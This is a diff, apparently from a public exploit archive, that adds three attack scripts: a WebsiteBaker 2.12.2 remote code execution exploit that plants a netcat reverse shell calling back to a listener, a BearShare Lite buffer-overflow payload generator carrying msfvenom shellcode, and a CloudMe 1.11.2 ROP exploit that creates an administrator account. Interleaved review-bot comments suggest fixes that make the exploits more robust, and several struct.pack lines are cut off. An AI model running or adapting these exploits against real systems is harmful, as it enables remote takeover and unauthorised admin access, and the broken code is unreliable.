diff --git a/exploits/php/webapps/48838.py b/exploits/php/webapps/48838.py
new file mode 100755
index 000000000..959ba4a6c
--- /dev/null
+++ b/exploits/php/webapps/48838.py
@@ -0,0 +1,108 @@ +# Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution +# Date: 2020-07-04 +# Exploit Author: Selim Enes 'Enesdex' Karaduman +# Vendor Homepage: https://websitebaker.org/pages/en/home.php +# Software Link: https://wiki.websitebaker.org/doku.php/downloads +# Version: 2.12.2 +# Tested on: Windows 10 and Ubuntu 18.04 +# Note : You start listener before execute (e.g netcat) then procide listener ip and port + +import requests +import re +from bs4 import BeautifulSoup +import sys +import getopt + +options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport=']) + +for opt, arg in options: + if opt in ('-h'): + print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT') + exit() + elif opt in ('-t'): + main_url = arg + elif opt in ('-u'): + usr = arg + elif opt in ('-p'): + passwd = arg + elif opt in ('-i', '--lhost'): + lhost = arg + elif opt in ('-l' , '--lport'): + lport = arg + +reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f" +shell_code_eval = "echo system('"+ reverse_shell_code + "');" + + +print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n") +##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS +url = main_url+"/admin/login/index.php" +req = requests.get(url) + +login_page = req.text +soup = BeautifulSoup(login_page, 'html.parser') +username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value'] +password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value'] +weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name'] +weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value'] + +#LOGIN TO GET SESSIoN_COOKIE +login_page = requests.Session() + +burp0_url = main_url+"/admin/login/index.php" +burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} +burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : 
weird_val, username_par : usr, password_par : passwd, "submit": ''} +r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False) + +cok = r.headers['Set-Cookie'] +cok = cok.split(' ')[0] +cookie_par = cok.split('=')[0] +cookie_val = cok.split('=')[1].replace(';','') +session_cookie = cookie_par + "=" + cookie_val + + +##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS +url = main_url+"/admin/pages/index.php" +cookies = {cookie_par : cookie_val} +req = requests.get(url, cookies=cookies) +create_page = req.text +soup = BeautifulSoup(create_page, 'html.parser') +weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name'] +weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value'] + +##Create Code Page to Put Shell Code +create_page = requests.session() + +burp0_url = main_url+"/admin/pages/add.php" +burp0_cookies = {cookie_par : cookie_val} +burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} +burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"} +c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) + +##FIND THE PAGE ID +url = main_url+"/admin/pages/index.php" +cookies = {cookie_par : cookie_val} +req = requests.get(url, cookies=cookies) +find_id = req.text +soup = BeautifulSoup(find_id, 'html.parser') +pageid = soup.find_all('option',string='exploit-shell')[0]['value'] + +##HTML PARSE TO PUT SHELL CODE +url = main_url+'/admin/pages/modify.php?page_id='+pageid +cookies = {cookie_par : cookie_val} +req = requests.get(url, cookies=cookies) +add_shellcode = req.text +soup = BeautifulSoup(add_shellcode, 'html.parser') +weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name'] +weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value'] + +##ADD SHELL CODE +session = requests.session() + +burp0_url = main_url+"/modules/code/save.php" +burp0_cookies = {cookie_par : cookie_val} 
+burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"} +burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval} +a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) + +last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies) \ No newline at end of file diff --git a/exploits/windows/local/48839.py b/exploits/windows/local/48839.py new file mode 100755 index 000000000..c55564fe3 --- /dev/null +++ b/exploits/windows/local/48839.py 
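Review bot: The option parsing in `for opt, arg in options:` tests `opt in ('-h')`, `opt in ('-t')`, `opt in ('-u')` and `opt in ('-p')` — the parentheses do not make a tuple, so these are substring checks against a one-option string that only work because getopt never yields a bare `-`; write `if opt == '-h':` (and likewise for the other single-option branches; `('-i', '--lhost')` and `('-l', '--lport')` are the only real tuples). When `-t`, `-u`, `-p`, `--lhost` or `--lport` is omitted, `main_url`, `usr`, `passwd`, `lhost` or `lport` is never bound and the script dies with a NameError on the first use instead of printing the usage text; bind each to `None` before the loop and print the usage when any is still `None` afterwards. `import re` is unused. The hunk appears truncated in this rendering around the `burp0_data` dictionary, so the login request could not be fully reviewed here.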
@@ -0,0 +1,40 @@ +# Title: BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC) +# Date: 2020-09-29 +# Author: Christian Vierschilling +# Vendor Homepage: http://www.bearshareofficial.com/ +# Software Link: http://www.oldversion.com.de/windows/bearshare-lite-5-2-5 +# Versions: 5.1.0 - 5.2.5 +# Tested on: Windows 10 x64 EN/DE +# CVE: NA + +# --- EXPLOTATION INSTRUCTIONS --- # +# 1. Adjust the values for "jmp_esp" and "shellcode" if needed +# 2. Run the script to generate a file pwn.txt, containing your payload +# 3. Open pwn.txt on your target (!!) (e.g. in the browser or locally) and copy the contents into the clipboard +# 4. Start BearShare, click on "Advanced..." and a new window will pop up. Put the payload from pwn.txt into the field "Keywords:" within the new window. Click on "Search" in this window and your payload will be executed. + +# --- PAYLOAD CONSTRUCTION --- # +#!/usr/bin/python +import binascii + +# Detected the offset for overwriting the EIP register using pattern_create and pattern_offset: [*] Exact match at offset 524 +junk1 = 524*"A" + +# Address for a JMP ESP instruction found in MSVBVM60.DLL using mona.py (You will probably need to adjust this if using another OS, language etc.) +# \x66\x06\x05\x35 +jmp_esp = binascii.unhexlify('35050666') + +# Using another 4 bytes to align the stack for clean shellcode execution +junk2 = 4*"B" + +# As we are limited to only being able to insert alphanumeric characters, we'll create an appropriate shellcode using msfvenom. 
Copy the output off the following command into the variable "shellcode" below: +# msfvenom -p windows/exec cmd=calc.exe BufferRegister=esp -e x86/alpha_mixed +shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8k2s0C0ePsPmYKUFQKpu4nk2ptpLKf26lLK3bTTNk1bexVoH7aZWVuaiollUl3QSLtBTlepyQZofmWqZgIrjRqBrwlKRrvpLK3zgLnkbl4Qt8hc3xc1HQv1lK2ya05QkcLK3ytXzCtzg9LKednkvaN6UaioNLzaZotM7qzgvXkPQeJVEScMIhWKQmq4T5xdChnkcha47qYCPfnkFlpKlKaHeLgqjsnk6dLKc1HPlI0Da4FDqKSkE1V9CjcaYoypcoaO0ZlKTRZKnm3msZ7qnmMUX230s05Pbpe8dqNkPoMWkO9EMkHpmenBcfU8MvnuMmMMKO9EelTFQlEZK0Ikm0puWumk1WuCD2PosZ7p1CyoxU3Se1bLbCDn55qhCUuPAA" + +# assemble payload +payload = junk1 + jmp_esp + junk2 + shellcode + +# write payload into pwn.txt +f = open("pwn.txt", 'w') +f.write(payload) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/48840.py b/exploits/windows/local/48840.py new file mode 100755 index 000000000..b3fd3b476 --- /dev/null +++ b/exploits/windows/local/48840.py 
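Review bot: The payload file is written with `f = open("pwn.txt", 'w')` / `f.write(payload)` / `f.close()`, which leaks the handle if `write` raises; use a context manager: `with open("pwn.txt", "w") as f:` followed by `f.write(payload)`. The `#!/usr/bin/python` shebang sits after the header comment block rather than on line 1, so it has no effect and should either move to the top of the file or be dropped. `binascii.unhexlify` returns `bytes`, while `junk1` and `junk2` are `str`, so `junk1 + jmp_esp + junk2 + shellcode` only concatenates on Python 2; the header should state the interpreter version the way the sibling file does (`# Script: Python 2.7`).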
@@ -0,0 +1,319 @@ +# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR) +# Exploit Author: Bobby Cooke (boku) +# CVE: CVE-2018-6892 +# Date: 2020-09-29 +# Vendor Homepage: https://www.cloudme.com/ +# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe +# Version: 1.11.2 +# Tested On: Windows 10 (x64) - 10.0.19041 Build 19041 +# Script: Python 2.7 +# Notes: +# This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the +# Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be +# running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required +# to create new users on the system. This exploit has been tested against multiple Windows 10 systems +# including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF. + +# CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR) +import os,sys,socket,struct +from colorama import Fore, Back, Style + +F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] +B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] +S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] +ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] +err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0] +def formatMsg(STRING): + return ok+S[3]+F[5]+STRING+S[0] +def formatErr(STRING): + return err+S[3]+F[2]+STRING+S[0] + +# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename +# ------------------------------------------------------------------------------------------------------- +# 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll] +# 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll] +# 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll] +# 
0x00400000 | 0x00831000 | False | False | False | False | False | [CloudMe.exe] +# 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll] +# 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll] +# 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll] + +def getESP_RC(): + GaDG3Tz = [ + # ESP -> EDI + # Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP + # Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr + 0x68bb4678, # POP EBX # RETN [Qt5Core.dll] + 0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory + 0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll] + 0x68D50537, # RETN - ROPNOP + 0x68D50537 # RETN - ROPNOP + ] + print(formatMsg("Get ESP ROP Chain built!")) + return ''.join(struct.pack(' > CALL to LoadLibraryA + # $+4 > FileName = "msvcrt.dll" + # EAX = 0x512 = 1298 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFAEE, # NEG FFFFFAEE = 0x512 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "msvcrt.dll" + 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "msvcrt.dll" + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -0xA = 0xFFFFFFF6 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFF6, # -0xA + # ESI = Start of string "msvcrt.dll\x00" + 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] + # EAX = PTR LoadLibraryA (from CloudMe Import Table) 
+ # CloudMe Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = kernel32.LoadLibraryA + 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] + # ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00" + 0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll] + # For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP + 0x68d32800, # POP ECX # RETN [Qt5Core.dll] + 0x68D50537, # RETN - ROPNOP + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x6990F972, # RETN 10 [Qt5Network.dll] + 0x68f7bc5e, # pushad # ret # [Qt5Core.dll] + # EAX -> EBP = msvcrt.dll + 0x68cc462c # XCHG EAX,EBP # RETN [Qt5Core.dll] + # EBP = msvcrt.dll + ] + print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!")) + return ''.join(struct.pack(' > CALL to GetProcAddress # EDX (ROPNOP) + # $+4 > hModule = [msvcrt] # ECX + # $+8 > ProcNameOrOrdinal (system) # EAX + # EAX = 0x4a2 = 1186 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "system" + 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "system" + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -0x6 = 0xFFFFFFFA + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFA, # -0x6 + # ESI = Start of string "system\x00" + 0x68c050c0, # ADD ESI,EAX # 
INC EBP # RETN [Qt5Core.dll] + 0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets) + # EAX = PTR GetProcAddr (from CloudMe Import Table) + # CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + 0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll] + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll + # For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP + # EBP -> EAX = msvcrt.dll + 0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll] + # ECX=&msvcrt.dll # EAX=["system\x00"] + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # EDX=ROPNOP + 0x68f94685, # POP EDX # RETN [Qt5Core.dll] + 0x68D50537, # RETN - ROPNOP + # EDI=FarRETN + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x699010B4, # ret 0C [Qt5Network.dll] + # KERNEL32.GetProcAddress [ESI pushed to stack] + # [EBP pushed to stack] + # [ESP pushed to stack] + # [EBX pushed to stack] +# land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack] + # MSVCRT.75F60000 [ECX pushed to stack] + # ASCII "system" [EAX pushed to stack] + 0X68f7bc5e, # pushad # ret # [Qt5Core.dll] + 0x68b1df17 # XCHG EAX,EDX # RETN # [Qt5Core.dll] + # EDX = msvcrt.system + ] + print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!")) + return ''.join(struct.pack(' > CALL to system + # $+4 > command = "net user boku 0v3R9000! /add" + # EAX = 0x438 = 1080 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "net user..." 
+ 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "net user..." + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -28 = -0x1C = 0xFFFFFFE4 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFE4, # -28 = -0x1C + # ESI = Start of string "net user...\x00" + 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] + # EDX = MSVCRT.system # ECX=0x0 + # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET + 0x68d32800, # POP ECX # RETN [Qt5Core.dll] + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + # ESI = MSVCRT.system # EAX = ["net user.."] + 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + # EDI=FarRETN + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x6990F972, # RETN 10 [Qt5Network.dll] + # PUSHAD - Setup Call to MSVCRT.system on stack + 0X68f7bc5e # pushad # ret # [Qt5Core.dll] + ] + print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!")) + return ''.join(struct.pack(' EDX + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] + # EAX = 0x3F7 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EDI + EAX = End of string "net local..." 
+ 0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll] + # EAX = 0x01 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFFF, # NEG FFFFFFfF = 0x01 + 0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll] + # EAX = 0x0 + 0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll] + # ECX = 0x0 + 0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll] + # Terminate String "net local..." + 0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI) + 0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI) + 0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll] + # EAX = -39 = -0x27 = 0xFFFFFFE4 + 0x68aec6ab, # POP EAX # RETN [Qt5Core.dll] + 0xFFFFFFD9, # -39 = -0x27 + # ESI = Start of string "net local...\x00" + 0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll] + # EDX = MSVCRT.system # ECX=0x0 + # For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP + 0x68d32800, # POP ECX # RETN [Qt5Core.dll] + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + # ESI = MSVCRT.system # EAX = ["net local.."] + 0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll] + 0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll] + # EDI=FarRETN + 0x699f37ad, # POP EDI # RETN [Qt5Network.dll] + 0x6990F972, # RETN 10 [Qt5Network.dll] + # PUSHAD - Setup Call to MSVCRT.system on stack + 0X68f7bc5e # pushad # ret # [Qt5Core.dll] + ] + print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!")) + return ''.join(struct.pack(' ___ | | .--.\n" + SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. 
|/ /__ __\n" + SIG += F[4]+" | ) "+F[2]+" * *"+F[4]+" / \\ \\\n" + SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n" + SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0] + return SIG + +def footer(): + foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n') + return foot + +if __name__ == "__main__": + print(header()) + print(sig()) + print(footer()) + if len(sys.argv) != 3: + print(formatErr("Usage: python %s " % sys.argv[0])) + print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0])) + sys.exit(-1) + host = sys.argv[1] + port = int(sys.argv[2]) + + rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain() + + os_EIP = '\41'*1052 + os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain)) + nSEH = '\x42'*4 + SEH = '\x43'*4 + buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH + + term = '\r\n' + kern32 = 'msvcrt.dll'+'AAAAAA' + winExe = 'system'+'BBBBBB' + addUsr = 'net user boku 0v3R9000! /add'+'CCCC' + addAdm = 'net localgroup Administrators boku /add'+'DDDD' + rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm)) + payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((host,port)) + print(formatMsg( "Successfully connected to "+host+" on port "+str(port))) + resp = sendRecv(sock,payload) + print(formatMsg("Closing Socket")) + sock.close() + print(formatErr("Exiting python script.")) + except: + print(formatErr("Failed to connect and send payload.")) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f1b3b15d7..a7e3567d3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
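Review bot: `print(formaterr("Example: ..." % sys.argv[0]))` in the `__main__` block references an undefined name — the helper defined above is `formatErr` — so a run with the wrong argument count prints one usage line and then crashes with a NameError; change it to `print(formatErr("Example: python %s '127.0.0.1' 8888" % sys.argv[0]))`. `os_EIP = '\41'*1052` uses an octal escape (byte 0x21, `!`) while every other filler in the block uses the hex form `'\x41'`; write `'\x41'*1052` for consistency, or comment the intent if the byte value is deliberate. The bare `except:` around the socket code swallows every exception, including KeyboardInterrupt and the real connection error, behind a generic message; narrow it to `except OSError as e:` and include `e` in the output. The hunk appears truncated in this rendering at each `struct.pack(` call (the format string and the trailing `for` are missing), so the chain-builder functions and the `sendRecv` helper they reference could not be fully reviewed here.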
@@ -10384,6 +10384,8 @@ id,file,description,date,author,type,platform,port
 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows,
 48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows,
 48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,
+48839,exploits/windows/local/48839.py,"BearShare Lite 5.2.5 - 'Advanced Search'Buffer Overflow in (PoC)",2020-09-29,"Christian Vierschilling",local,windows,
+48840,exploits/windows/local/48840.py,"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)",2020-09-29,boku,local,windows,
 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux,
 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows,
 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows,
@@ -40661,6 +40663,7 @@ id,file,description,date,author,type,platform,port
 48834,exploits/multiple/webapps/48834.txt,"B-swiss 3 Digital Signage System 3.6.5 - Database Disclosure",2020-09-25,LiquidWorm,webapps,multiple,
 48835,exploits/hardware/webapps/48835.py,"Mida eFramework 2.8.9 - Remote Code Execution",2020-09-28,elbae,webapps,hardware,
 48837,exploits/multiple/webapps/48837.txt,"Joplin 1.0.245 - Arbitrary Code Execution (PoC)",2020-09-28,"Ademar Nowasky Junior",webapps,multiple,
+48838,exploits/php/webapps/48838.py,"WebsiteBaker 2.12.2 - Remote Code Execution",2020-09-29,Enesdex,webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,